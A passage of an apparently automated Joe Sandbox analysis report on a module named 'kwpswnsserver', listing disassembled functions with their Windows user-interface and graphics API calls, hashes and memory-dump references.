                                                                    • Part of subcall function 6C8A00A7: GetDesktopWindow.USER32 ref: 6C8A0101
                                                                    • Part of subcall function 6C8A00A7: SendMessageW.USER32(00000000,0000014F,00000000,00000000), ref: 6C8A0115
                                                                  • GetMenu.USER32(?), ref: 6C894B09
                                                                  • GetMenuItemCount.USER32(?), ref: 6C894B47
                                                                  • GetSubMenu.USER32(?,00000000), ref: 6C894B5D
                                                                  • GetMenuItemCount.USER32(?), ref: 6C894B82
                                                                  • GetMenuItemID.USER32(?,00000000), ref: 6C894B9C
                                                                  • GetSubMenu.USER32(?,?), ref: 6C894BB8
                                                                  • GetMenuItemID.USER32(?,00000000), ref: 6C894BD0
                                                                  • GetMenuItemCount.USER32(?), ref: 6C894BF1
                                                                  • GetMenuItemID.USER32(?,?), ref: 6C894C27
                                                                  • SendMessageW.USER32(?,00000362,-0000E001,00000000), ref: 6C894CE3
                                                                  • UpdateWindow.USER32(?), ref: 6C894D04
                                                                  • GetKeyState.USER32(00000079), ref: 6C894D22
                                                                  • GetKeyState.USER32(00000012), ref: 6C894D33
                                                                  • GetParent.USER32(?), ref: 6C894DF5
                                                                  • PostMessageW.USER32(?,0000036A,00000000,00000000), ref: 6C894E0F
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Item$CountMessageParentWindow$SendState$DesktopFocusLongPostUpdate
                                                                  • String ID:
                                                                  • API String ID: 1315724587-0
                                                                  • Opcode ID: 33c79407203ac32b7b859d7656ae5916662cd313877e7ab56eadb08b2c20d251
                                                                  • Instruction ID: df08d226ee1ebe9d86bdb730537a81d14664fdad7be9218f60d462031eb06c13
                                                                  • Opcode Fuzzy Hash: 33c79407203ac32b7b859d7656ae5916662cd313877e7ab56eadb08b2c20d251
                                                                  • Instruction Fuzzy Hash: DAC1C53570021AEFDB249F68CE84BADBBB5BFC5319F108969E825D7A50DB309841CB50
                                                                  Function 6C882ABF Relevance: 22.7, APIs: 15, Instructions: 212windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C882AC6
                                                                  • GetSysColor.USER32(00000014), ref: 6C882AFD
                                                                    • Part of subcall function 6C883207: __EH_prolog3.LIBCMT ref: 6C88320E
                                                                    • Part of subcall function 6C883207: CreateSolidBrush.GDI32(6C88F6CB), ref: 6C883229
                                                                  • GetSysColor.USER32(00000010), ref: 6C882B12
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 6C882B26
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 6C882B3E
                                                                  • GetObjectW.GDI32(10C2C95B,00000018,?), ref: 6C882B61
                                                                  • CreateBitmap.GDI32(?,?,?,?,00000000), ref: 6C882B82
                                                                  • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 6C882BA3
                                                                    • Part of subcall function 6C883C26: SelectObject.GDI32(6C88F6CB,?), ref: 6C883C2F
                                                                  • GetPixel.GDI32(?,00000000,00000000), ref: 6C882BEB
                                                                    • Part of subcall function 6C883536: SetBkColor.GDI32(?,6C88F6CB), ref: 6C88354B
                                                                    • Part of subcall function 6C883536: SetBkColor.GDI32(?,6C88F6CB), ref: 6C88355D
                                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 6C882C14
                                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,001100A6), ref: 6C882C3E
                                                                  • BitBlt.GDI32(?,00000001,00000001,?,?,?,00000000,00000000,00E20746), ref: 6C882CA9
                                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00E20746), ref: 6C882CD2
                                                                  • DeleteDC.GDI32(00000000), ref: 6C882D47
                                                                  • DeleteDC.GDI32(00000000), ref: 6C882D66
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Create$Color$BitmapCompatibleDeleteH_prolog3Object$BrushPixelSelectSolid
                                                                  • String ID:
                                                                  • API String ID: 2254850417-0
                                                                  • Opcode ID: c08a162fffb2cd55f30199b18cc0893fb66783dbc57ede01834e8df3043a3f52
                                                                  • Instruction ID: 08491b056702d68c27816735f17d842b3e0c14b48d6b7e3acade84d8c2e958d0
                                                                  • Opcode Fuzzy Hash: c08a162fffb2cd55f30199b18cc0893fb66783dbc57ede01834e8df3043a3f52
                                                                  • Instruction Fuzzy Hash: A6817971902219AFDF219FE4DE55AEEBF79BF18304F104429F501B6AA0DB705E05DB60
                                                                  Function 6C8BECEB Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 347windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C8BECF5
                                                                  • GetClientRect.USER32(?,?), ref: 6C8BED13
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 6C8BED4C
                                                                  • CreateCompatibleBitmap.GDI32(?,?,?), ref: 6C8BEDA1
                                                                  • CreateDIBSection.GDI32(?,?), ref: 6C8BEE13
                                                                  • CreateDIBSection.GDI32(?,00000028,00000000,?,00000000,00000000), ref: 6C8BEE4C
                                                                  • CreateDIBSection.GDI32(?,00000028,00000000,?,00000000,00000000), ref: 6C8BEE7F
                                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 6C8BEEE7
                                                                  • GetWindowRect.USER32(?,?), ref: 6C8BEF56
                                                                  • BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00CC0020), ref: 6C8BF0A6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Create$Section$CompatibleRect$BitmapClientH_prolog3_Window
                                                                  • String ID: (
                                                                  • API String ID: 2918208214-3887548279
                                                                  • Opcode ID: 51c6925f575eb448206a55ce7c0f6600b5447407e14f3b25a13a300a37f3f044
                                                                  • Instruction ID: a62a1f32be30b80ce94843ea3dfbf8a353650b8c90fea3dea97954895cd1f9b1
                                                                  • Opcode Fuzzy Hash: 51c6925f575eb448206a55ce7c0f6600b5447407e14f3b25a13a300a37f3f044
                                                                  • Instruction Fuzzy Hash: 0DD14B75A0061AAFDF25CFA8CA849EEBBB9FF08304F10456AE519A7710DB30AD55CF50
                                                                  Function 6C952B0D Relevance: 21.3, APIs: 14, Instructions: 313COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6C89BAAC: GetWindowLongW.USER32(?,000000EC), ref: 6C89BAB9
                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 6C952B5B
                                                                  • FillRect.USER32(?,?,00000000), ref: 6C952BA5
                                                                  • GetWindowRect.USER32(?,?), ref: 6C952BFE
                                                                  • GetWindowRect.USER32(8B0C4DFF,?), ref: 6C952C12
                                                                  • SetRectEmpty.USER32(?), ref: 6C952C35
                                                                  • SetRect.USER32(?,?,?,?,?), ref: 6C952C75
                                                                  • IsRectEmpty.USER32(?), ref: 6C952C7F
                                                                  • FillRect.USER32(?,?,00000000), ref: 6C952CA4
                                                                  • SetRectEmpty.USER32(?), ref: 6C952D0F
                                                                    • Part of subcall function 6C883F11: ClientToScreen.USER32(?,6C8BDD00), ref: 6C883F20
                                                                    • Part of subcall function 6C883F11: ClientToScreen.USER32(?,6C8BDD08), ref: 6C883F2D
                                                                    • Part of subcall function 6C883F50: ScreenToClient.USER32(?,6C8993A1), ref: 6C883F5F
                                                                    • Part of subcall function 6C883F50: ScreenToClient.USER32(?,6C8993A9), ref: 6C883F6C
                                                                  • InflateRect.USER32(?,00000001,00000001), ref: 6C952E2D
                                                                  • IntersectRect.USER32(?,?,?), ref: 6C952E3C
                                                                  • InflateRect.USER32(?,00000001,00000001), ref: 6C952E48
                                                                  • IntersectRect.USER32(?,?,?), ref: 6C952E57
                                                                  • FillRect.USER32(?,?,00000000), ref: 6C952E75
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$ClientScreen$EmptyFillInflateWindow$Intersect$Long
                                                                  • String ID:
                                                                  • API String ID: 3688554768-0
                                                                  • Opcode ID: 9dd532fbbc74c48a9cea306df78ffa97d833f978b86cc6beef5ed246f0973f04
                                                                  • Instruction ID: 77cf86178e4e881da30707141d4c434be53676682c8afa34f3127617f450e2d7
                                                                  • Opcode Fuzzy Hash: 9dd532fbbc74c48a9cea306df78ffa97d833f978b86cc6beef5ed246f0973f04
                                                                  • Instruction Fuzzy Hash: B5C12C71A0061ADFCF05CFA8CA889EEB7F9FF49304B144269E815EB610D735EA16CB50
                                                                  Function 6C90CD6E Relevance: 21.2, APIs: 2, Strings: 10, Instructions: 195COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C90CD75
                                                                    • Part of subcall function 6C8FE220: __EH_prolog3.LIBCMT ref: 6C8FE227
                                                                  • GetWindowRect.USER32(?,?), ref: 6C90CE5B
                                                                    • Part of subcall function 6C89BB93: GetDlgCtrlID.USER32(?), ref: 6C89BB9E
                                                                    • Part of subcall function 6C90EA7B: GetWindowRect.USER32(?,?), ref: 6C90EA89
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog3RectWindow$Ctrl
                                                                  • String ID: %TsPane-%d$%TsPane-%d%x$IsFloating$MRUWidth$Panes$PinState$RecentFrameAlignment$RecentRowIndex$RectRecentDocked$RectRecentFloat
                                                                  • API String ID: 2598721110-2628993547
                                                                  • Opcode ID: 80e55429bf6cfc69338827cefa4fe0ebe6494f0e2510cda0cf54fe676d84d147
                                                                  • Instruction ID: e7f74f4d2211b02fafad170fa35f63e930d90a7b5d8269fb14e51ff04fae522b
                                                                  • Opcode Fuzzy Hash: 80e55429bf6cfc69338827cefa4fe0ebe6494f0e2510cda0cf54fe676d84d147
                                                                  • Instruction Fuzzy Hash: 05814B35A002199FCF04DFA4C8949FEB776BF89314F594568E916AB3A1DB30AC02CF60
                                                                  Function 6C8C04FF Relevance: 19.8, APIs: 13, Instructions: 273windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetMessageW.USER32(?,00000000,0000000F,0000000F), ref: 6C8C0532
                                                                  • DispatchMessageW.USER32(?), ref: 6C8C0540
                                                                  • PeekMessageW.USER32(?,00000000,0000000F,0000000F,00000000), ref: 6C8C054E
                                                                  • GetCapture.USER32 ref: 6C8C0558
                                                                  • SetCapture.USER32(?), ref: 6C8C056C
                                                                  • GetWindowRect.USER32(?,?), ref: 6C8C0589
                                                                  • GetCapture.USER32 ref: 6C8C05FC
                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 6C8C0619
                                                                  • DispatchMessageW.USER32(?), ref: 6C8C063F
                                                                  • GetScrollPos.USER32(00000000,00000002), ref: 6C8C075C
                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000581), ref: 6C8C0779
                                                                  • ReleaseCapture.USER32 ref: 6C8C081B
                                                                  • IsWindow.USER32(?), ref: 6C8C0824
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Message$Capture$Window$Dispatch$PeekRectRedrawReleaseScroll
                                                                  • String ID:
                                                                  • API String ID: 1873598099-0
                                                                  • Opcode ID: d79fe2c979774e8eed93d99995273aaa75dd1f6b0fcc25e0f09bbae238709040
                                                                  • Instruction ID: 795634df974d3583c2e1da66bcd30e5f91723dd8fe1fdf63c5eba139c3e433e8
                                                                  • Opcode Fuzzy Hash: d79fe2c979774e8eed93d99995273aaa75dd1f6b0fcc25e0f09bbae238709040
                                                                  • Instruction Fuzzy Hash: 0BA1A071B012198BDF28DF68C998BEE3BB5FF49744F144579E80AAB685CB309801CF91
                                                                  Function 6C90CB71 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 164COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C90CB78
                                                                    • Part of subcall function 6C8FE220: __EH_prolog3.LIBCMT ref: 6C8FE227
                                                                    • Part of subcall function 6C89BB93: GetDlgCtrlID.USER32(?), ref: 6C89BB9E
                                                                    • Part of subcall function 6C909EC4: __EH_prolog3.LIBCMT ref: 6C909ECB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog3$Ctrl
                                                                  • String ID: %TsPane-%d$%TsPane-%d%x$IsFloating$MRUWidth$Panes$PinState$RecentFrameAlignment$RecentRowIndex$RectRecentDocked$RectRecentFloat
                                                                  • API String ID: 3879667756-2628993547
                                                                  • Opcode ID: 8ee140afa95f064847f7efded9bd72ea728fe3748703db2ef9b3ecc661f9eb67
                                                                  • Instruction ID: aaa4055c7f5f4ae42a9026d0171e0e2092fb50aed2e42c072a6282b8fe83d310
                                                                  • Opcode Fuzzy Hash: 8ee140afa95f064847f7efded9bd72ea728fe3748703db2ef9b3ecc661f9eb67
                                                                  • Instruction Fuzzy Hash: CB519575B0022EAFCF08DF64C8949FE7B75BF49314B044569E816AB381DB35AD06CBA1
                                                                  Function 6C8B6F77 Relevance: 18.4, APIs: 12, Instructions: 406timewindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C8B6F7E
                                                                  • SetCursor.USER32(?,00000048,6C8B6425,00000000,00000200,00000000), ref: 6C8B701D
                                                                    • Part of subcall function 6C883D59: __EH_prolog3.LIBCMT ref: 6C883D60
                                                                    • Part of subcall function 6C883D59: GetDC.USER32(00000000), ref: 6C883D8C
                                                                    • Part of subcall function 6C8A0935: __EH_prolog3_GS.LIBCMT ref: 6C8A093C
                                                                    • Part of subcall function 6C8A0935: CreateRectRgnIndirect.GDI32(?), ref: 6C8A0974
                                                                    • Part of subcall function 6C8A0935: CopyRect.USER32(?,?), ref: 6C8A0988
                                                                    • Part of subcall function 6C8A0935: InflateRect.USER32(?,?,?), ref: 6C8A099E
                                                                    • Part of subcall function 6C8A0935: IntersectRect.USER32(?,?,?), ref: 6C8A09AA
                                                                    • Part of subcall function 6C8A0935: CreateRectRgnIndirect.GDI32(?), ref: 6C8A09B4
                                                                    • Part of subcall function 6C8A0935: CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 6C8A09C9
                                                                    • Part of subcall function 6C8A0935: CombineRgn.GDI32(?,?,?,00000003), ref: 6C8A09E3
                                                                    • Part of subcall function 6C8A0935: CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 6C8A0A2A
                                                                    • Part of subcall function 6C8A0935: SetRectRgn.GDI32(?,?,00000004,?,?), ref: 6C8A0A47
                                                                    • Part of subcall function 6C8A0935: CopyRect.USER32(?,?), ref: 6C8A0A52
                                                                    • Part of subcall function 6C883DAE: ReleaseDC.USER32(?,00000000), ref: 6C883DE2
                                                                  • GetFocus.USER32 ref: 6C8B70B4
                                                                  • SetTimer.USER32(?,0000EC07,000001F4,00000000), ref: 6C8B71A5
                                                                  • TrackMouseEvent.USER32(?,?,?,?,?,?,00000000), ref: 6C8B71DC
                                                                  • SendMessageW.USER32(?,00000362,0000E001,00000000), ref: 6C8B7262
                                                                  • InvalidateRect.USER32(?,?,00000001,?,?,?,?,?,?,00000000), ref: 6C8B739D
                                                                  • InflateRect.USER32(?,00000000,?), ref: 6C8B73E3
                                                                  • RedrawWindow.USER32(?,?,00000000,00000401,?,?,?,?,?,00000000), ref: 6C8B73F6
                                                                  • KillTimer.USER32(?,0000EC07,?,?,?,?,?,00000000), ref: 6C8B7485
                                                                  • SetTimer.USER32(?,0000EC07,000001F4,00000000), ref: 6C8B74A3
                                                                  • UpdateWindow.USER32(?), ref: 6C8B74CC
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Create$Timer$CopyH_prolog3_IndirectInflateWindow$CombineCursorEventFocusH_prolog3IntersectInvalidateKillMessageMouseRedrawReleaseSendTrackUpdate
                                                                  • String ID:
                                                                  • API String ID: 3035320136-0
                                                                  • Opcode ID: 1283023e56d2beb889afb32b70e36e34d7d0a78f6940a992a2de344f2b19ff10
                                                                  • Instruction ID: 1a0d6b029717727b2c9ed2e41daf21021abb0131fb8fd8224798008f8bfb47d0
                                                                  • Opcode Fuzzy Hash: 1283023e56d2beb889afb32b70e36e34d7d0a78f6940a992a2de344f2b19ff10
                                                                  • Instruction Fuzzy Hash: 48F1A530601716EFDB298F64C954BADBBB1BF45318F144729F829A77D0DB30A851CBA0
                                                                  Function 6C8CE218 Relevance: 18.1, APIs: 12, Instructions: 127windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C8CE21F
                                                                  • IsWindowVisible.USER32(?), ref: 6C8CE278
                                                                  • CreateRectRgn.GDI32(00000000,00000000,?,?), ref: 6C8CE2AA
                                                                  • CreateRectRgn.GDI32(00000000,00000000,00000005,00000005), ref: 6C8CE2C9
                                                                  • CombineRgn.GDI32(?,?,?,00000003), ref: 6C8CE2E3
                                                                  • CreateEllipticRgn.GDI32(00000000,00000000,0000000B,0000000B), ref: 6C8CE2F7
                                                                  • CombineRgn.GDI32(?,?,?,00000002), ref: 6C8CE311
                                                                  • CreateRectRgn.GDI32(?,00000000,?,00000005), ref: 6C8CE32A
                                                                  • CombineRgn.GDI32(?,?,?,00000003), ref: 6C8CE344
                                                                  • CreateEllipticRgn.GDI32(?,00000000,?,0000000B), ref: 6C8CE360
                                                                  • CombineRgn.GDI32(?,?,?,00000002), ref: 6C8CE37A
                                                                  • SetWindowRgn.USER32(?,00000000,00000001), ref: 6C8CE38E
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Create$Combine$Rect$EllipticWindow$H_prolog3Visible
                                                                  • String ID:
                                                                  • API String ID: 1706452674-0
                                                                  • Opcode ID: 63122730c34b5c44ab6c76737cb829e0f5c3d581401da576c546ff4851a201a1
                                                                  • Instruction ID: b38e1ea093e1147e6c0f7a310af5d55a363657856d2d71760a9fc71a10b8764a
                                                                  • Opcode Fuzzy Hash: 63122730c34b5c44ab6c76737cb829e0f5c3d581401da576c546ff4851a201a1
                                                                  • Instruction Fuzzy Hash: C6417571A0021AABDF25AFA4CD55EFFBB39BF04709F104928B115A66D0DB319905CBA1
                                                                  Function 6C936E93 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 131windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C936E9A
                                                                  • GetObjectW.GDI32(00000018,00000018,00000000), ref: 6C936EB1
                                                                    • Part of subcall function 6C936DF0: CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 6C936E67
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 6C936F31
                                                                  • SelectObject.GDI32(?,00000018), ref: 6C936F44
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 6C936F62
                                                                  • SelectObject.GDI32(?,?), ref: 6C936F77
                                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 6C936F96
                                                                  • SelectObject.GDI32(?,00000000), ref: 6C936FA4
                                                                  • SelectObject.GDI32(?,00000000), ref: 6C936FAE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Object$Select$Create$Compatible$H_prolog3Section
                                                                  • String ID:
